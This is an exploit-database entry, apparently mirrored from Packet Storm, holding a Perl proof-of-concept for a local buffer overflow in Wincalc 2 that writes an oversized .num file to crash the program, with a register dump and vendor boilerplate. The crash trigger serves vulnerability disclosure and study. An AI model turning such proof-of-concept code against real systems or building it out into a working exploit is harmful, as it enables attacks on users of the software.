Lucene search
K

Wincalc 2 Local Buffer Overflow

🗓️ 26 Jun 2010 00:00:00Reported by MadjiXType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Wincalc 2 Local Buffer Overflow exploi

Code
`  
  
###################################################################  
#Exploit Title : Wincalc 2 (.num) local Buffer Overflow Poc  
#tested on windows xp SP 3 FR  
#Author: MadjiX - Dz8[at]HotmaiL[dot]CoM  
#download: http://math.exeter.edu/rparris/peanut/wcru32z.exe  
#Special Greets:Bibi-info , His0k4 [ where are you :( ]  
###################################################################  
#EAX 00000001  
#ECX 41414141  
#EDX 00000000  
#EBX 0046EE18  
#ESP 0012F868  
#EBP 0012F8AC  
#ESI 009A2DC0  
#EDI 0000003B  
#EIP 00417A74 wcalcru.00417A74  
#C 0 ES 0023 32bit 0(FFFFFFFF)  
#P 0 CS 001B 32bit 0(FFFFFFFF)  
#A 0 SS 0023 32bit 0(FFFFFFFF)  
#Z 0 DS 0023 32bit 0(FFFFFFFF)  
#S 0 FS 003B 32bit 7FFDD000(FFF)  
###################################################################  
my $file = "MadjiX.NUM";  
my $junk1 = "\x41" x 2000 ;  
my $junk2 = "\x42" x 2000 ;  
my $junk3 = "\x43" x 2000 ;  
my $junk4 = "\x44" x 2000 ;  
my $junk5 = "\x45" x 2000 ;  
my $junk6 = "\x46" x 2000 ;  
my $junk7 = "\x47" x 2000 ;  
my $junk8 = "\x48" x 2000 ;  
open($FILE,">$file");  
print $FILE $junk1.$junk2.$junk3.$junk4.$junk5.$junk6.$junk7.$junk8;  
close($FILE);  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation